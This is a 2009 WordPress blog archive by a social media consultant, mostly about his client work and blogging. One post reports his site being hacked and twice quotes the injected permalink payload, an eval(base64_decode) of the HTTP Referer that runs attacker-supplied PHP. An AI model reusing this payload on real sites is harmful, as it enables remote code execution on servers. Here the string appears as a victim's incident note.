Archive for the ‘wordpress’ Category

Update on WP hack

Sunday, September 6th, 2009

Intro

For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

  • List of tweets, which pretty much explain what happened
  • Brief notes of more detail
  • Other links, if they’re not in the first two sections
  • Actions. Bah

Tweets

  1. argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
  2. http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :’( 3:42 PM Sep 4th from twhirl
  3. ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
  4. Site back in action: WP Permalink config restored -http://twurl.nl/ddfchd fyi ‘Hardening Wordpress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
  5. just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
  6. Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl

Notes

  1. Was posting about YouTube videos on Cloud Computing
  2. Copying and pasting the URL into Twhirl to send out on Twitter
  3. Noticed there was a whole string of characters after the ‘proper’ URL
  4. Deleted post
  5. Republished
  6. It was still there
  7. Copied the string and Googled it
  8. Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
  9. Went on from there & blogged original post…

Looking at my install:

  • The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
  • WP pages seem clean at the mo’

Various links

Worthwhile checking out

Actions

  • Need to do several more, more detailed trawls through my WP install
  • Probably need to do a rebuild (from scratch, preferably). Meh
  • Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.

Temporary Post Used For Theme Detection (ce85c37e-6266-4dfa-9ef0-798a4b11720d – 3bfe001a-32de-4114-a6b4-4005b770f6d7)

Tuesday, September 1st, 2009

This is a temporary post that was not deleted. Please delete this manually. (55c01edd-484c-440c-9f6d-94eaeb884579 – 3bfe001a-32de-4114-a6b4-4005b770f6d7)

UPDATE: Oops! I use Windows Live Writer, and was pretty much doing what it says above. It’s gone out via Twitter, so in case anyone’s wondering – you now have your explanation! ;-)

Cover it Live sessions for Thinking Digital #TDC

Monday, May 11th, 2009

For all you lovely folk who can’t make it to Thinking Digital, I plan to use Cover it Live to write up my experience of Thinking Digital.

Hopefully the information below will give you an idea of how to use CiL (you get this text if you click on "Reader Information).

"Reader Information

  • There’s nothing to do during a Live Event other than read, watch and occasionally send in a comment or vote in the polling questions.
  • It’s not a chatroom. You go to largely find out what the writer has to say. An open chat with thirty or more readers turns into poor, disjointed content very quickly.
  • Your comments are published at the Writer’s discretion. The Writer can view all comments sent to them but only they can publish your comments for everyone to see.
  • Our ‘autoscroll’ feature ensures you’re always shown the newest content without having to refresh or scroll your screen. You can turn this on or off by using the controls at the bottom of the Viewer Window.
  • Subtle sound effects alert you to new content as the writer publishes it. This can also be turned on or off as needed."

You should be able to use the boxes below to send yourself a reminder as appropriate.

Please let me know if you have any issues via the Contact Us form,

 

UPDATE: I now think I’ll be at all the sessions, fingers crossed & laptop battery willing! ;-)

Social Media at CONNECT North East

Monday, May 11th, 2009

 

This post sets out the work I have been doing with CONNECT North East which, in its own words, is:

  •  ”the newest branch of the highly successful CONNECT network, which brokers introductions between young technology companies and investors.
  • CONNECT North East’s role is to strengthen the links between the region’s young technology businesses and the people and organisations they need to know if they are going to attract investment and grow.
  • CONNECT North East facilitates introductions to encourage partnership working, joint ventures, knowledge transfer and financial investment.”

I have been working with John Sargent of The Ideas Mine, and Caroline Theobald of Bridge Club Limited to help them use Social Media to market the recent CONNECT North East Investing in a Secure Future conference, and better connect with their target market – i.e. early stage technology companies and start-ups.

Testimonial

Caroline Theobald of Bridge Club Limited said:

“We engaged Justin because we knew that some of the innovative companies that national government departments are interested in were more likely to respond to the conference’s networking opportunities if we made them accessible through their preferred media channels: ie blogs and tweets. 

New media is something that I know very little about – just appreciate it effectiveness – and so we invested in the services of an expert.  An experience that exceeded our expectations in terms of profile and user-group engagement.”*

In sum, I set up their blog, taught them how to use Twitter, and live-blogged at the Conference itself.

Blog

  • Set up on Wordpress
  • Configuration of users and various widgets etc.
  • Creation of kick-off post
  • RSS / Syndication via Feedburner

Twitter

  • Set up of CONNECT North East account
  • Installation of Twitter clients – e.g. Tweetdeck
  • Twitter widget on blog
  • Training about what Twitter is, how it can be used, and ‘encouragement’[!] for the new users ;-)

Conference

  • Live-blogging from the conference using Cover It Live
  • Video capture & interviewing of key conference stakeholders
  • Upload of presenters’ slides to Slideshare
  • Video editing & upload to YouTube

Social Media strategy

  • Advice on which platforms to use, e.g.:
  • Ongoing mentoring & (lightweight) technical support
  • Ambassador role, writing posts like this to indirectly highlight CONNECT North East activities
  • Guest blogging

Possible future activities

  • Set up of CONNECT North East-branded social network
  • Further advice, tweeting & blogging
  • Exploration of further tools for feedback & stakeholder engagement

If this is the sort of thing that you could benefit from, please use the Contact Form and get in touch!

*Disclosure: Caroline and I have lived together for nearly 8 years. But she’s totally objective, honest.

Series of Web 2.0 articles in bdaily

Wednesday, January 7th, 2009

Web 2.0 by Daniel F. Pigatto.

Photo credit to Daniel F. Pigatto

If you follow my Twitterstream, you’ll have seen I’m putting together a series of articles on Web 2.0.

Today, the first one is published, via bdaily’s e-mail and web channels.

I will be re-publishing the articles on this blog, and putting a summary page on the top-right so that you can find the articles more easily.

They are my personal take on the whole shooting match, and are designed to aid and inform, so please don’t flame me!

That said, I’d love to get your constructive feedback, so please fire it over to me via a comment below, or the contact form.

web 2.0 is web 0.0 future

Photo credit to Will Lion

Delicious blog posting

Wednesday, November 19th, 2008

A quick note to say that I’ve been experimenting with having Delicious post my links from the previous day to this blog (e.g.).

I’ve decided it would be better to have these links on my personal blog, so until I port Wellbanked over to Wordpress, it’ll have to wait!

btw, I’ve thinking of using the justingsouter.eu domain (+ .co.uk & .com) for Wellbanked. Please let me know what you think, using the form below or my shiny new contact form.

I’ll keep you posted – ttfn.

Technorati Tags: ,,,

Hello everyone. And Welcome!

Wednesday, October 22nd, 2008

Hello Everyone xoxo

Photo credit to Elizabeth Dunn

Thank you for stopping by my new site. :-D

I intend to use this blog to:

  • Plug my new ventures
  • Comment on Web 2.0 and Social Media issues
  • Tell a story about the life of what will shortly be Souter Consulting Limited

I will continue to post to my personal blog, but felt it was important to separate out work issues to avoid confusion!

Please bear in mind that I’m new to WordPress, and therefore expect the look-and-feel and functionality to evolve as I master the platform.

I realise that I’m using the default WordPress theme, but I’m going to leave it until I’ve got a theme I’m happy with. Personal faves at the moment:

That said, I will be concentrating on content, rather than bells and whistles – hopefully I can resist the temptation to fiddle. :-/